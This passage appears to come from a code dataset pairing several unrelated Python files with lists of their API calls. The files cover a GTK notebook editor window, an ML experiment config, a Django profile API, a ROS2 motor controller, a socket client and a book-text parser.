self.__file_list.connect('rename-file', self.on_file_list_rename_file)
self.__file_list.connect('delete-file', self.on_file_list_delete_file)
hpaned.pack2(self.nb_widget, resize=True)
self.nb_widget.set_scrollable(True)
def _add_editor(self, editor):
# Set first since _add_editor() calls _update_editor_title()
editor._notebook_tab_label = gtk.Label()
editor._notebook_tab_status = gtk.Image()
editor._notebook_tab_status.props.icon_size = gtk.ICON_SIZE_MENU
BaseNotebookWindow._add_editor(self, editor)
label_widget = gtk.HBox(False, 4)
label_widget.pack_start(editor._notebook_tab_status, True, True, 0)
label_widget.pack_start(editor._notebook_tab_label, True, True, 0)
tab_button = gtk.Button()
tab_button.set_name('notebook-close-button')
tab_button.set_relief(gtk.RELIEF_NONE)
tab_button.props.can_focus = False
tab_button.connect('clicked', lambda *args: self.on_tab_close_button_clicked(editor))
label_widget.pack_start(tab_button, False, False, 0)
close = gtk.image_new_from_stock('gtk-close', gtk.ICON_SIZE_MENU)
tab_button.add(close)
label_widget.show_all()
self.nb_widget.set_tab_label(editor.widget, label_widget)
self.nb_widget.set_tab_reorderable(editor.widget, True)
def _update_editor_title(self, editor):
BaseNotebookWindow._update_editor_title(self, editor)
editor._notebook_tab_label.set_text(editor.title)
def _update_editor_state(self, editor):
BaseNotebookWindow._update_editor_state(self, editor)
editor._notebook_tab_status.props.stock = NotebookFile.stock_id_for_state(editor.state)
#######################################################
# Callbacks
#######################################################
def on_tab_close_button_clicked(self, editor):
self._close_editor(editor)
def on_file_list_open_file(self, file_list, file):
self.open_file(file)
def on_file_list_close_file(self, file_list, file):
for editor in self.editors:
if editor.file == file:
self._close_editor(editor)
def on_file_list_rename_file(self, file_list, file):
if file.active:
# If we have the file open, we need to rename via the editor
for editor in self.editors:
if editor.file == file:
editor.rename()
# Reselect the new item in the list
new_file = self.notebook.file_for_absolute_path(editor.filename)
file_list.select_file(new_file)
else:
# Otherwise do it directly
def check_name(name):
return name != "" and name != file.path
def do_rename(new_path):
old_path = os.path.join(self.notebook.folder, file.path)
os.rename(old_path, new_path)
self.notebook.refresh()
# Reselect the new item in the list
new_file = self.notebook.file_for_absolute_path(new_path)
file_list.select_file(new_file)
title = "Rename '%s'" % file.path
builder = SaveFileBuilder(title, file.path, "Rename", check_name)
builder.dialog.set_transient_for(self.window)
builder.name_entry.set_text(file.path)
if isinstance(file, WorksheetFile):
extension = "rws"
elif isinstance(file, LibraryFile):
extension = "py"
else:
extension = ""
builder.prompt_for_name(self.notebook.folder, extension, do_rename)
builder.dialog.destroy()
def on_file_list_delete_file(self, file_list, file):
dialog = gtk.MessageDialog(parent=self.window, buttons=gtk.BUTTONS_NONE,
type=gtk.MESSAGE_WARNING)
message = format_escaped("<big><b>Really delete '%s'?</b></big>", file.path)
dialog.set_markup(message)
dialog.add_buttons(gtk.STOCK_CANCEL, gtk.RESPONSE_CANCEL,
gtk.STOCK_DELETE, gtk.RESPONSE_OK)
dialog.set_default_response(gtk.RESPONSE_CANCEL)
response = dialog.run()
dialog.destroy()
if response != gtk.RESPONSE_OK:
return
for editor in self.editors:
if editor.file == file:
self._close_editor(editor)
abspath = os.path.join(self.notebook.folder, file.path)
os.remove(abspath)
self.notebook.refresh()
def on_hpaned_notify_position(self, pane, gparamspec):
self.state.set_pane_position(pane.get_property('position'))
| [
"gtk.ScrolledWindow",
"file_list.FileList",
"gtk.rc_parse_string",
"base_notebook_window.BaseNotebookWindow._add_editor",
"gtk.HBox",
"gtk.MessageDialog",
"base_notebook_window.BaseNotebookWindow.__init__",
"os.remove",
"base_notebook_window.BaseNotebookWindow._update_editor_state",
"base_notebook... | [((515, 800), 'gtk.rc_parse_string', 'gtk.rc_parse_string', (['"""\n style "notebook-close-button" {\n GtkWidget::focus-line-width = 0\n GtkWidget::focus-padding = 0\n GtkButton::inner-border = { 0, 0, 0, 0 }\n }\n widget "*.notebook-close-button" style : highest "notebook-close-button"\n """'], {}), '(\n """\n style "notebook-close-button" {\n GtkWidget::focus-line-width = 0\n GtkWidget::focus-padding = 0\n GtkButton::inner-border = { 0, 0, 0, 0 }\n }\n widget "*.notebook-close-button" style : highest "notebook-close-button"\n """\n )\n', (534, 800), False, 'import gtk\n'), ((2182, 2225), 'base_notebook_window.BaseNotebookWindow.__init__', 'BaseNotebookWindow.__init__', (['self', 'notebook'], {}), '(self, notebook)\n', (2209, 2225), False, 'from base_notebook_window import BaseNotebookWindow\n'), ((2458, 2470), 'gtk.HPaned', 'gtk.HPaned', ([], {}), '()\n', (2468, 2470), False, 'import gtk\n'), ((2809, 2829), 'gtk.ScrolledWindow', 'gtk.ScrolledWindow', ([], {}), '()\n', (2827, 2829), False, 'import gtk\n'), ((2989, 3012), 'file_list.FileList', 'FileList', (['self.notebook'], {}), '(self.notebook)\n', (2997, 3012), False, 'from file_list import FileList\n'), ((3607, 3618), 'gtk.Label', 'gtk.Label', ([], {}), '()\n', (3616, 3618), False, 'import gtk\n'), ((3657, 3668), 'gtk.Image', 'gtk.Image', ([], {}), '()\n', (3666, 3668), False, 'import gtk\n'), ((3750, 3794), 'base_notebook_window.BaseNotebookWindow._add_editor', 'BaseNotebookWindow._add_editor', (['self', 'editor'], {}), '(self, editor)\n', (3780, 3794), False, 'from base_notebook_window import BaseNotebookWindow\n'), ((3819, 3837), 'gtk.HBox', 'gtk.HBox', (['(False)', '(4)'], {}), '(False, 4)\n', (3827, 3837), False, 'import gtk\n'), ((4010, 4022), 'gtk.Button', 'gtk.Button', ([], {}), '()\n', (4020, 4022), False, 'import gtk\n'), ((4337, 4394), 'gtk.image_new_from_stock', 'gtk.image_new_from_stock', (['"""gtk-close"""', 'gtk.ICON_SIZE_MENU'], {}), "('gtk-close', gtk.ICON_SIZE_MENU)\n", (4361, 4394), False, 'import gtk\n'), ((4642, 4695), 'base_notebook_window.BaseNotebookWindow._update_editor_title', 'BaseNotebookWindow._update_editor_title', (['self', 'editor'], {}), '(self, editor)\n', (4681, 4695), False, 'from base_notebook_window import BaseNotebookWindow\n'), ((4807, 4860), 'base_notebook_window.BaseNotebookWindow._update_editor_state', 'BaseNotebookWindow._update_editor_state', (['self', 'editor'], {}), '(self, editor)\n', (4846, 4860), False, 'from base_notebook_window import BaseNotebookWindow\n'), ((4911, 4956), 'notebook.NotebookFile.stock_id_for_state', 'NotebookFile.stock_id_for_state', (['editor.state'], {}), '(editor.state)\n', (4942, 4956), False, 'from notebook import NotebookFile, WorksheetFile, LibraryFile\n'), ((7045, 7139), 'gtk.MessageDialog', 'gtk.MessageDialog', ([], {'parent': 'self.window', 'buttons': 'gtk.BUTTONS_NONE', 'type': 'gtk.MESSAGE_WARNING'}), '(parent=self.window, buttons=gtk.BUTTONS_NONE, type=gtk.\n MESSAGE_WARNING)\n', (7062, 7139), False, 'import gtk\n'), ((7188, 7254), 'format_escaped.format_escaped', 'format_escaped', (['"""<big><b>Really delete \'%s\'?</b></big>"""', 'file.path'], {}), '("<big><b>Really delete \'%s\'?</b></big>", file.path)\n', (7202, 7254), False, 'from format_escaped import format_escaped\n'), ((7728, 7773), 'os.path.join', 'os.path.join', (['self.notebook.folder', 'file.path'], {}), '(self.notebook.folder, file.path)\n', (7740, 7773), False, 'import os\n'), ((7782, 7800), 'os.remove', 'os.remove', (['abspath'], {}), '(abspath)\n', (7791, 7800), False, 'import os\n'), ((6474, 6529), 'save_file.SaveFileBuilder', 'SaveFileBuilder', (['title', 'file.path', '"""Rename"""', 'check_name'], {}), "(title, file.path, 'Rename', check_name)\n", (6489, 6529), False, 'from save_file import SaveFileBuilder\n'), ((6098, 6143), 'os.path.join', 'os.path.join', (['self.notebook.folder', 'file.path'], {}), '(self.notebook.folder, file.path)\n', (6110, 6143), False, 'import os\n'), ((6160, 6189), 'os.rename', 'os.rename', (['old_path', 'new_path'], {}), '(old_path, new_path)\n', (6169, 6189), False, 'import os\n')] |
from dps.hyper import run_experiment
from dps.utils import copy_update
from dps.tf.updater import DummyUpdater
from silot.run import basic_config, alg_configs, env_configs
import argparse
parser = argparse.ArgumentParser()
parser.add_argument('--max-digits', type=int, choices=[6, 12], required=True)
args, _ = parser.parse_known_args()
readme = "Running SILOT experiment on moving_mnist."
run_kwargs = dict(
max_hosts=1, ppn=6, cpp=2, gpu_set="0,1", pmem=10000, project="rpp-bengioy",
wall_time="96hours", cleanup_time="5mins", slack_time="5mins", n_repeats=6,
copy_locally=True, config=dict(render_step=1000000)
)
durations = dict(
long=copy_update(run_kwargs),
short=dict(
wall_time="180mins", gpu_set="0", ppn=4, n_repeats=4, distributions=None,
config=dict(max_steps=3000, render_step=500, eval_step=100, display_step=100, stage_steps=600, curriculum=[dict()]),
),
build=dict(
ppn=1, cpp=1, gpu_set="0", wall_time="180mins", n_repeats=1, distributions=None,
config=dict(
do_train=False, get_updater=DummyUpdater, render_hook=None,
curriculum=[dict()] + [dict(max_digits=i, n_train=100, n_val=1000) for i in range(1, 13)]
)
),
)
config = basic_config.copy()
config.update(env_configs['moving_mnist'])
config.update(alg_configs['silot'], max_digits=args.max_digits)
config.update(final_count_prior_log_odds=0.0125, stage_steps=40000)
run_experiment(
"moving_mnist_silot",
config, "silot on moving_mnist.",
name_variables="max_digits",
durations=durations
)
| [
"silot.run.basic_config.copy",
"dps.hyper.run_experiment",
"dps.utils.copy_update",
"argparse.ArgumentParser"
] | [((198, 223), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {}), '()\n', (221, 223), False, 'import argparse\n'), ((1244, 1263), 'silot.run.basic_config.copy', 'basic_config.copy', ([], {}), '()\n', (1261, 1263), False, 'from silot.run import basic_config, alg_configs, env_configs\n'), ((1440, 1564), 'dps.hyper.run_experiment', 'run_experiment', (['"""moving_mnist_silot"""', 'config', '"""silot on moving_mnist."""'], {'name_variables': '"""max_digits"""', 'durations': 'durations'}), "('moving_mnist_silot', config, 'silot on moving_mnist.',\n name_variables='max_digits', durations=durations)\n", (1454, 1564), False, 'from dps.hyper import run_experiment\n'), ((660, 683), 'dps.utils.copy_update', 'copy_update', (['run_kwargs'], {}), '(run_kwargs)\n', (671, 683), False, 'from dps.utils import copy_update\n')] |
from django.contrib.auth import get_user_model
from rest_framework import viewsets, status, permissions
from rest_framework.response import Response
from profiles.models import Profile
from profiles.permissions import IsUserProfileOrAdmin
from profiles import serializers
User = get_user_model()
class ProfileViewSet(viewsets.ModelViewSet):
queryset = Profile.objects.all()
lookup_field = 'uuid'
permission_classes = []
def create(self, request, *args, **kwargs):
serializer = self.get_serializer(data=request.data)
serializer.is_valid(raise_exception=True)
instance = self.perform_create(serializer)
headers = self.get_success_headers(serializer.data)
instance_serializer = serializers.ProfileSerializer(instance)
return Response(instance_serializer.data, status=status.HTTP_201_CREATED, headers=headers)
def perform_create(self, serializer):
return serializer.save()
def update(self, request, *args, **kwargs):
if not request.data.get('user'):
return Response(dict(error='Attribute \'user\' is missing.'), status=status.HTTP_400_BAD_REQUEST)
if not request.data.get('social_link'):
return Response(dict(error='Attribute \'social_link\' is missing.'), status=status.HTTP_400_BAD_REQUEST)
return super().update(request, *args, **kwargs)
def destroy(self, request, *args, **kwargs):
instance = self.get_object()
user = instance.user
social_link = instance.social_link
social_link.delete()
self.perform_destroy(instance)
user.delete()
return Response(status=status.HTTP_204_NO_CONTENT)
def get_serializer_class(self):
if self.action == 'create':
return serializers.ProfileCreateSerializer
if self.action in ['update', 'partial_update']:
return serializers.ProfileUpdateSerializer
return serializers.ProfileSerializer
def get_permissions(self):
if self.action in ['list']:
self.permission_classes = (
permissions.IsAuthenticated,
permissions.IsAdminUser
)
if self.action in ['update', 'partial_update', 'destroy']:
self.permission_classes = (
permissions.IsAuthenticated,
IsUserProfileOrAdmin
)
return super().get_permissions()
| [
"profiles.serializers.ProfileSerializer",
"django.contrib.auth.get_user_model",
"rest_framework.response.Response",
"profiles.models.Profile.objects.all"
] | [((282, 298), 'django.contrib.auth.get_user_model', 'get_user_model', ([], {}), '()\n', (296, 298), False, 'from django.contrib.auth import get_user_model\n'), ((361, 382), 'profiles.models.Profile.objects.all', 'Profile.objects.all', ([], {}), '()\n', (380, 382), False, 'from profiles.models import Profile\n'), ((739, 778), 'profiles.serializers.ProfileSerializer', 'serializers.ProfileSerializer', (['instance'], {}), '(instance)\n', (768, 778), False, 'from profiles import serializers\n'), ((794, 882), 'rest_framework.response.Response', 'Response', (['instance_serializer.data'], {'status': 'status.HTTP_201_CREATED', 'headers': 'headers'}), '(instance_serializer.data, status=status.HTTP_201_CREATED, headers=\n headers)\n', (802, 882), False, 'from rest_framework.response import Response\n'), ((1644, 1687), 'rest_framework.response.Response', 'Response', ([], {'status': 'status.HTTP_204_NO_CONTENT'}), '(status=status.HTTP_204_NO_CONTENT)\n', (1652, 1687), False, 'from rest_framework.response import Response\n')] |
import rclpy
import json,numpy
from numpy import clip
from rclpy.node import Node
from std_msgs.msg import Float64MultiArray
from sensor_msgs.msg import JointState
from diagnostic_msgs.msg import DiagnosticStatus, KeyValue
import can
from tinymovr import Tinymovr
from tinymovr.iface.can import CAN
from tinymovr.units import get_registry
from math import pi
ureg = get_registry()
amps = ureg.ampere
s = ureg.second
minute = ureg.minute
tick = ureg.tick
rad = ureg.radian
turn = ureg.turn
deg = ureg.degree
class HardwareAbstractionLayer(Node):
def __init__(self):
super().__init__('HardwareAbstractionLayer')
# Lecture du fichier de configuration des moteurs
f = open("/home/vanille/ros2_ws/src/hal/config.json","r")
self.config = json.load(f)
f.close()
self.can_bus = can.Bus(bustype='slcan',channel='/dev/ttyACM0',bitrate=1000000)
self.iface = CAN(self.can_bus)
for kmotor,motor in self.config['motors'].items():
if "id_can" in motor :
motor["tm"]=Tinymovr(node_id=int(motor["id_can"]), iface=self.iface)
assert(motor["tm"].motor_config.flags == 1)
motor["offset"] = motor["tm"].encoder_estimates.position
self.declare_parameter(kmotor+"_max_speed",motor["max_speed"])
self.declare_parameter(kmotor+"_max_current",motor["max_current"])
motor["tm"].set_limits(motor["max_speed"]*turn/minute,motor["max_current"]*amps)
self.declare_parameter(kmotor+"_gain_integrator",motor["gain_integrator"])
motor["tm"].set_integrator_gains(motor["gain_integrator"])
self.publisherJoint_ = self.create_publisher(JointState, '/vanille/joint_states', 1)
self.publisherDiag_ = self.create_publisher(DiagnosticStatus, 'diagnostic',1)
self.subscription = self.create_subscription(
JointState,
'/vanille/joint_position_cmd',
self.update_position_cmd,
1)
timer_period = 0.01 # seconds
timer_period_diag = 2 # seconds
self.timer = self.create_timer(timer_period, self.routine)
self.timerDiag = self.create_timer(timer_period_diag, self.updateDiagnostic)
def update_position_cmd(self, msg : JointState):
for imotor in range(len(msg.name)):
kmotor = msg.name[imotor]
if kmotor in self.config['motors']:
motor = self.config['motors'][kmotor]
position_target = msg.position[imotor]*rad
if numpy.isnan(position_target) :
motor["tm"].current_control()
motor["tm"].set_cur_setpoint(0.0*amps)
else:
position_target = clip(position_target,motor["limit_lower"]*deg, motor["limit_upper"]*deg)
if motor["orientation"] == "direct":
motor["tm"].position_control()
# motor["tm"].set_pos_setpoint(motor["offset"]+position_target*float(motor["ratio"]))
motor["tm"].set_pos_setpoint(motor["offset"]+position_target*motor["ratio"])
elif motor["orientation"] == "indirect":
motor["tm"].position_control()
# motor["tm"].set_pos_setpoint(motor["offset"]-position_target*float(motor["ratio"]))
motor["tm"].set_pos_setpoint(motor["offset"]-position_target*motor["ratio"])
def read_positions(self):
msg = JointState()
msg.header.stamp = super().get_clock().now().to_msg()
msg.name = []
msg.position = []
msg.velocity = []
msg.effort = []
for kmotor,motor in self.config['motors'].items():
msg.name.append(motor["joint_name"])
if motor["orientation"] == "direct":
msg.position.append(float((motor["tm"].encoder_estimates.position-motor["offset"])/float(motor["ratio"])))
msg.velocity.append(motor["tm"].encoder_estimates.velocity.to(rad/s).m/float(motor["ratio"]))
msg.effort.append(motor["tm"].Iq.estimate.m*float(motor["ratio"]))
elif motor["orientation"] == "indirect":
msg.position.append(float(-(motor["tm"].encoder_estimates.position-motor["offset"])/float(motor["ratio"])))
msg.velocity.append(-motor["tm"].encoder_estimates.velocity.to(rad/s).m/float(motor["ratio"]))
msg.effort.append(-motor["tm"].Iq.estimate.m*float(motor["ratio"]))
self.publisherJoint_.publish(msg)
def updateDiagnostic(self):
# tmx.device_info = {"device_id": 99999, "fw_major": 0, "fw_minor": 7, "fw_patch": 1, "temp": 45}
# tmx.motor_config = {"flags": 1, "R": 200, "pole_pairs": 11, "L": 100}
msg = DiagnosticStatus()
msg1 = KeyValue()
for kmotor,motor in self.config['motors'].items():
msg.values= []
msg.hardware_id = kmotor
msg.name = kmotor
msg.message = "device_info motor_config"
for kinfo,info in motor["tm"].device_info.items():
msg1 = KeyValue()
msg1.key=kinfo
msg1.value=str(info)
msg.values.append(msg1)
for kinfo,info in motor["tm"].motor_config.items():
msg1 = KeyValue()
msg1.key=kinfo
msg1.value=str(info)
msg.values.append(msg1)
self.publisherDiag_.publish(msg)
def routine(self):
self.read_positions()
def stop(self):
self.get_logger().info(f'Stopping HAL Node')
for kmotor,motor in self.config['motors'].items():
motor["tm"].idle()
def main(args=None):
print('Hi from hal.')
rclpy.init(args=args)
hal_node = HardwareAbstractionLayer()
try:
rclpy.spin(hal_node)
except KeyboardInterrupt:
pass
hal_node.stop()
# Destroy the node explicitly
# (optional - otherwise it will be done automatically
# when the garbage collector destroys the node object)
hal_node.destroy_node()
rclpy.shutdown()
if __name__ == '__main__':
main() | [
"diagnostic_msgs.msg.KeyValue",
"numpy.clip",
"tinymovr.units.get_registry",
"rclpy.spin",
"diagnostic_msgs.msg.DiagnosticStatus",
"sensor_msgs.msg.JointState",
"can.Bus",
"numpy.isnan",
"json.load",
"rclpy.init",
"rclpy.shutdown",
"tinymovr.iface.can.CAN"
] | [((370, 384), 'tinymovr.units.get_registry', 'get_registry', ([], {}), '()\n', (382, 384), False, 'from tinymovr.units import get_registry\n'), ((5874, 5895), 'rclpy.init', 'rclpy.init', ([], {'args': 'args'}), '(args=args)\n', (5884, 5895), False, 'import rclpy\n'), ((6223, 6239), 'rclpy.shutdown', 'rclpy.shutdown', ([], {}), '()\n', (6237, 6239), False, 'import rclpy\n'), ((783, 795), 'json.load', 'json.load', (['f'], {}), '(f)\n', (792, 795), False, 'import json, numpy\n'), ((846, 911), 'can.Bus', 'can.Bus', ([], {'bustype': '"""slcan"""', 'channel': '"""/dev/ttyACM0"""', 'bitrate': '(1000000)'}), "(bustype='slcan', channel='/dev/ttyACM0', bitrate=1000000)\n", (853, 911), False, 'import can\n'), ((931, 948), 'tinymovr.iface.can.CAN', 'CAN', (['self.can_bus'], {}), '(self.can_bus)\n', (934, 948), False, 'from tinymovr.iface.can import CAN\n'), ((3582, 3594), 'sensor_msgs.msg.JointState', 'JointState', ([], {}), '()\n', (3592, 3594), False, 'from sensor_msgs.msg import JointState\n'), ((4888, 4906), 'diagnostic_msgs.msg.DiagnosticStatus', 'DiagnosticStatus', ([], {}), '()\n', (4904, 4906), False, 'from diagnostic_msgs.msg import DiagnosticStatus, KeyValue\n'), ((4922, 4932), 'diagnostic_msgs.msg.KeyValue', 'KeyValue', ([], {}), '()\n', (4930, 4932), False, 'from diagnostic_msgs.msg import DiagnosticStatus, KeyValue\n'), ((5956, 5976), 'rclpy.spin', 'rclpy.spin', (['hal_node'], {}), '(hal_node)\n', (5966, 5976), False, 'import rclpy\n'), ((2605, 2633), 'numpy.isnan', 'numpy.isnan', (['position_target'], {}), '(position_target)\n', (2616, 2633), False, 'import json, numpy\n'), ((5225, 5235), 'diagnostic_msgs.msg.KeyValue', 'KeyValue', ([], {}), '()\n', (5233, 5235), False, 'from diagnostic_msgs.msg import DiagnosticStatus, KeyValue\n'), ((5431, 5441), 'diagnostic_msgs.msg.KeyValue', 'KeyValue', ([], {}), '()\n', (5439, 5441), False, 'from diagnostic_msgs.msg import DiagnosticStatus, KeyValue\n'), ((2805, 2882), 'numpy.clip', 'clip', (['position_target', "(motor['limit_lower'] * deg)", "(motor['limit_upper'] * deg)"], {}), "(position_target, motor['limit_lower'] * deg, motor['limit_upper'] * deg)\n", (2809, 2882), False, 'from numpy import clip\n')] |
import socket
HOST = ""
PORT = ""
def address():
global HOST
print("What is the IP of the computer you want to connect to? ")
HOST = input(":")
global PORT
print("What is the PORT of the computer you want to connect to? ")
PORT = int(input(":"))
connector()
def connector():
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
s.connect((HOST, PORT))
s.sendall(b"test")
data = s.recv(1024)
print(f"Received {data!r}")
address()
| [
"socket.socket"
] | [((330, 379), 'socket.socket', 'socket.socket', (['socket.AF_INET', 'socket.SOCK_STREAM'], {}), '(socket.AF_INET, socket.SOCK_STREAM)\n', (343, 379), False, 'import socket\n')] |
import re
import _pickle as cPickle
import logging
import argparse
#This script is not dependant on table of contents. It detects books and chapters based their titles
# Dictionary containing key and regex pattern to match the keys
pattern_dict = {
'blank_line': re.compile(r'^\s*$'),
'book_number': re.compile(r'(BOOK\s\w+):?\s?(.+)?'),
'chapter_number': re.compile(r'CHAPTER\s(\w+)'),
'epilogue_number': re.compile(r'([A-Za-z]+\sEPILOGUE):?\s?(.+)?')
}
BODY_START_CONSEC_BLANK_LINE_COUNT = 9 #Number of blank lines between table of contents and chapter 1
FOOTER_START_CONSEC_BLANK_LINE_COUNT = 9 #Number of blank lines between end of last chapter start of footer
END_OF_CHAPTER_CONSEC_BLANK_LINE_COUNT = 4 #Number of blank lines between
class Book(object):
def __init__(self, bk_number, bk_year, chapter_list):
self.bk_number = bk_number
self.bk_year = bk_year
self.chapter_list = chapter_list
logging.info('Created book: {}'.format(self.bk_number))
class Chapter(object):
def __init__(self, ch_index, paragraph_list):
self.ch_index = ch_index
self.paragraph_list = paragraph_list
class Paragraph(object):
def __init__(self, p_index, sentence_list):
self.p_index = p_index
self.sentence_list = sentence_list
class Sentence(object):
def __init__(self, s_index,wordObj_list):
self.s_index = s_index
self.wordObj_list = wordObj_list
class Word(object):
def __init__(self, w_index, word):
self.w_index = w_index
self.word = word
def parse_line(line):
"""
Do a regex search against regexes defined in pattern_dict and
return the key and match result of the first matching regex
"""
for key, rx in pattern_dict.items():
match = rx.search(line)
if match:
return key, match
# if there are no matches
return None, None
def obj_dict(obj):
"""
Default method to serialize objects json.dump cannor serialize
"""
return obj.__dict__
def process_file(filepath):
"""
Process file line by line.
Input:
filepath: location of the file to be processed
Return:
book_list: A list if Book objects containing chapters, paragraphs, sentences and words
"""
book_list = []
try:
with open(filepath, encoding="utf8", mode='r') as file: # open file
header_end_found = False # True if active line is in the body section of the file(and not header)
prev_key,book_index,chapter_index = '','',''
paragraph_index,sentence_index,word_index = 1,1,1
# temporary lists to store the lower level objects before adding to the higher level object
sentence_list,paragraph_list,chapter_list,word_list = [],[],[],[]
# I am assuming that the whole book may not be available at once. So I am going with the safe option of
# reading a line at once. Does not load the whole file in memory
for line in file:
key, match = parse_line(line) # evaluates the line against regex expressions in pattern_dict
if key == 'blank_line' and prev_key == 'blank_line':
consec_empty_line_count += 1 # found consecutive blank lines, increment counter
else:
consec_empty_line_count = 0 # did not find consecutive blank line, so reset it to 0
if not header_end_found: # continue till end of header is found. no processing requirements in header
if consec_empty_line_count == BODY_START_CONSEC_BLANK_LINE_COUNT:
header_end_found = True
else: # in book body
if key == 'book_number' or key == 'epilogue_number': # current line is beginning of a book
if chapter_list: # also, end of previous book and its last chapter (not true for first book)
book_ob = Book(book_index,book_year,chapter_list)
# create a book object to store previous book, set its index,
# year and chapter list and clear chapters list
book_list.append(book_ob)
chapter_list = []
# get the name and index of the new book
book_index = match.group(1)
book_year = match.group(2)
elif key == 'chapter_number': # current line is beginning of a new chapter
# get chapter name
chapter_index = match.group(1)
# reset paragraph, sentence and word indices
paragraph_index = 1
sentence_index = 1
word_index = 1
elif key == 'blank_line': # current line is blank line
if consec_empty_line_count == FOOTER_START_CONSEC_BLANK_LINE_COUNT:
# 10 consecutive lines, so end of last book
book_ob = Book(book_index, book_year, chapter_list) # create book object for last book
book_list.append(book_ob) # append it to books list
break # exiting the loop as processing of footer is not required
if word_list: # paragraph ended without a .? or ! (could be a paragraph ending with:)
# end the sentence and add it to the sentence list
sen_ob = Sentence(sentence_index, word_list)
sentence_list.append(sen_ob)
word_list = []
#if consec_empty_line_count == END_OF_CHAPTER_CONSEC_BLANK_LINE_COUNT and paragraph_list.__len__() > 0:
if consec_empty_line_count == END_OF_CHAPTER_CONSEC_BLANK_LINE_COUNT and paragraph_list:
# end of chapter. Create chapter object and save the chapter
chap_ob = Chapter(chapter_index,paragraph_list)
chapter_list.append(chap_ob)
paragraph_list = []
elif sentence_list:
#end of paragraph. add paragraph to paragraph list
par_ob = Paragraph(paragraph_index,sentence_list)
sentence_list = []
paragraph_list.append(par_ob)
paragraph_index += 1
sentence_index = 1
word_index = 1
else: # line with content
line = line.replace("’","") # remove apostrophes from line
# split lines into sentences
sen_in_line = re.split(r'(?<!St)[.!?]', line)
if sen_in_line.__len__() == 1: #line without sentence endings
words_in_line = re.findall(r'[\w]+',line)
# find words and add them to the list
for word in words_in_line:
word_index = add_word_to_list(word, word_index, word_list)
else: #line containing sentence endings
for idx, split in enumerate(sen_in_line):
if split: #check to exclude multiple consecutive periods (...)
words_in_line = re.findall(r'[\w]+', split)
# find words and add them to the list
for word in words_in_line:
word_index = add_word_to_list(word, word_index, word_list)
if (idx+1) < sen_in_line.__len__():
# line contains end of sentence. add sentence to sentence list
sen_ob = Sentence(sentence_index,word_list)
sentence_list.append(sen_ob)
word_list = []
sentence_index += 1
word_index = 1
prev_key = key
if not header_end_found:
logging.error("Header end not defined")
except FileNotFoundError as ex:
print(ex)
except IOError as ex:
print(ex)
except Exception as ex:
print(ex)
return book_list
def add_word_to_list(word, word_index, word_list):
"""
Add words to word list. Increment word index
Input:
word: Word to be added
word_index: Index of the word in the word list
word_list: List of words to which the word will be added
Return:
word_index
"""
word_ob = Word(word_index, word)
word_list.append(word_ob)
word_index += 1
return word_index
logging.basicConfig(level=logging.DEBUG,format='%(asctime)s:%(levelname)s:%(message)s')
def main_wrapper(args):
"""
:param args:
:return:
"""
inp_filepath = args.input_file_path
out_filepath = args.output_file_path
logging.info('Working on book: {}'.format(inp_filepath))
book_list = process_file(inp_filepath)
if book_list:
try:
with open(out_filepath,mode='wb') as cpickle_file:
cPickle.dump(book_list,cpickle_file)
except Exception as ex:
print(ex)
else:
print('No books found')
def args_parser():
"""
handles and validates CLI
:return:
"""
parser = argparse.ArgumentParser(description="Parses files containing books and serializes the structure")
parser.add_argument("-inp",help="full path of the file to parse",dest = "input_file_path",type=str,required=True)
parser.add_argument("-out", help="output path to the serialized file", dest="output_file_path", type=str, required=True)
parser.set_defaults(func=main_wrapper)
args = parser.parse_args()
args.func(args)
if __name__ == '__main__':
args_parser() | [
"logging.basicConfig",
"re.split",
"argparse.ArgumentParser",
"_pickle.dump",
"re.compile",
"re.findall",
"logging.error"
] | [((9074, 9167), 'logging.basicConfig', 'logging.basicConfig', ([], {'level': 'logging.DEBUG', 'format': '"""%(asctime)s:%(levelname)s:%(message)s"""'}), "(level=logging.DEBUG, format=\n '%(asctime)s:%(levelname)s:%(message)s')\n", (9093, 9167), False, 'import logging\n'), ((269, 289), 're.compile', 're.compile', (['"""^\\\\s*$"""'], {}), "('^\\\\s*$')\n", (279, 289), False, 'import re\n'), ((310, 348), 're.compile', 're.compile', (['"""(BOOK\\\\s\\\\w+):?\\\\s?(.+)?"""'], {}), "('(BOOK\\\\s\\\\w+):?\\\\s?(.+)?')\n", (320, 348), False, 'import re\n'), ((370, 400), 're.compile', 're.compile', (['"""CHAPTER\\\\s(\\\\w+)"""'], {}), "('CHAPTER\\\\s(\\\\w+)')\n", (380, 400), False, 'import re\n'), ((424, 471), 're.compile', 're.compile', (['"""([A-Za-z]+\\\\sEPILOGUE):?\\\\s?(.+)?"""'], {}), "('([A-Za-z]+\\\\sEPILOGUE):?\\\\s?(.+)?')\n", (434, 471), False, 'import re\n'), ((9756, 9858), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': '"""Parses files containing books and serializes the structure"""'}), "(description=\n 'Parses files containing books and serializes the structure')\n", (9779, 9858), False, 'import argparse\n'), ((8449, 8488), 'logging.error', 'logging.error', (['"""Header end not defined"""'], {}), "('Header end not defined')\n", (8462, 8488), False, 'import logging\n'), ((9530, 9567), '_pickle.dump', 'cPickle.dump', (['book_list', 'cpickle_file'], {}), '(book_list, cpickle_file)\n', (9542, 9567), True, 'import _pickle as cPickle\n'), ((6919, 6949), 're.split', 're.split', (['"""(?<!St)[.!?]"""', 'line'], {}), "('(?<!St)[.!?]', line)\n", (6927, 6949), False, 'import re\n'), ((7082, 7108), 're.findall', 're.findall', (['"""[\\\\w]+"""', 'line'], {}), "('[\\\\w]+', line)\n", (7092, 7108), False, 'import re\n'), ((7603, 7630), 're.findall', 're.findall', (['"""[\\\\w]+"""', 'split'], {}), "('[\\\\w]+', split)\n", (7613, 7630), False, 'import re\n')] |
from __future__ import print_function
from fileinput import filename
import os
import pandas as pd
import pdb
from datetime import timedelta
import datetime
import shutil
date_time_format = '%Y-%m-%dT%H:%M:%S.%f'
date_format = '%Y-%m-%d'
def make_dir(data_path):
if os.path.exists(data_path) is False:
os.mkdir(data_path)
def check_micu_data_valid(data_time, start_date1, end_date1, start_date2, end_date2):
cond1 = (pd.to_datetime(data_time) - pd.to_datetime(start_date1)).total_seconds() >= 0
cond2 = (pd.to_datetime(end_date1) - pd.to_datetime(data_time)).total_seconds() >= 0
cond3 = False
cond4 = False
if start_date2 != 'nan':
cond3 = (pd.to_datetime(data_time) - pd.to_datetime(start_date2)).total_seconds() >= 0
cond4 = (pd.to_datetime(end_date2) - pd.to_datetime(data_time)).total_seconds() >= 0
